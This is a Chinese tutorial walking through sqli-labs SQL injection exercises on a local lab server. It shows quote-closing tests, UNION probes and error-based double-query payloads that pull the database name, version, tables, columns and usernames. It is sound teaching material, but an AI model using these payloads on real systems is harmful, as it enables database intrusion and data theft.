sql注入是top 10中的一个,是需要好好学习的一个漏洞。
注入攻击的更远在于,程序命令和用户数据之前没有进行校验,使得攻击者有机会将程序命令当做用户输入的数据交给web程序,为所欲为。
简之:接受相关参数未经处理直接带入数据库查询操作。
首先来看一下正常测试,输入ID之后进行测试,返回正常
对网址进行单引号后缀产生了错误。
爆出错误为
You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near ”1” LIMIT 0,1’ at line 1
这里猜测数据库的查询语句为:
select *from users where id='1' limit 0,1;
我们来进行测试:
构造sql注入语句
http://127.0.0.1/sqli-labs-master/Less-1?id=1'and '1'='1
进行测试:
单引号型就是在查询语句中使用单引号进行包裹的。
首先测试id=1。
返回正常数据
使用单引号进行测试
返回错误
You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near ” LIMIT 0,1’ at line 1
我们来剥离进行查看
这里说是单引号出了问题。
猜测这里没有单引号。
使用注入语句进行测试:
http://127.0.0.1/sqli-labs-master/Less-2?id=1 and 1=1
http://127.0.0.1/sqli-labs-master/Less-2?id=1 and 1=2
猜测正确。
数字型就是直接通过数字进行判断,没有任何包裹。
使用单引号测试’
You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near ''1'') LIMIT 0,1' at line 1
出错了,进行错误分析。
' ' 1' ') LIMIT 0,1 '
发现这里少了一个’)括号。进行语句构造:
id=1') and 1=1 --+
and 1=2测试
存在漏洞。
字符型就是通过’)大括号进行闭合进行查询。
这里滤过正确测试。
使用id=1"
进行测试
You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near '"1"") LIMIT 0,1' at line 1
产生错误。进行分析。构造判断语句。
http://localhost/sqli-labs-master/Less-4/?id=1") and 1=1 --+
和单引号字符型类似。
select count(*),concat(0x3a,0x3a,floor(rand()*2)name from information_schema.tables group by name)
通过改变数字来进行判断。
order by 3 --+
union select 1,2,3 --+
id=1' and (select 1 from (select count(*),concat(0x3a,0x3a,database(),0x3a,0x3a,floor(rand()*2))name from information_schema.tables group by name)b) --+
id=1' and (select 1 from (select count(*),concat(0x3a,0x3a,version(),0x3a,0x3a,floor(rand()*2))name from information_schema.tables group by name)b) --+
id=1' and (select 1 from (select count(*),concat(0x3a,0x3a,(select table_name from information_schema.tables where table_schema=database() limit 0,1),0x3a,0x3a,floor(rand()*2))name from information_schema.tables group by name)b) --+
id=1' and (select 1 from (select count(*),concat(0x3a,0x3a,(select table_name from information_schema.tables where table_schema=database() limit 1,1),0x3a,0x3a,floor(rand()*2))name from information_schema.tables group by name)b) --+
id=1' and (select 1 from (select count(*),concat(0x3a,0x3a,(select column_name from information_schema.columns where table_name='users' limit 1,1),0x3a,0x3a,floor(rand()*2))name from information_schema.tables group by name)b) --+
id=1' and (select 1 from (select count(*),concat(0x3a,0x3a,(select username from users limit 2,1),0x3a,0x3a,floor(rand()*2))name from information_schema.tables group by name)b) --+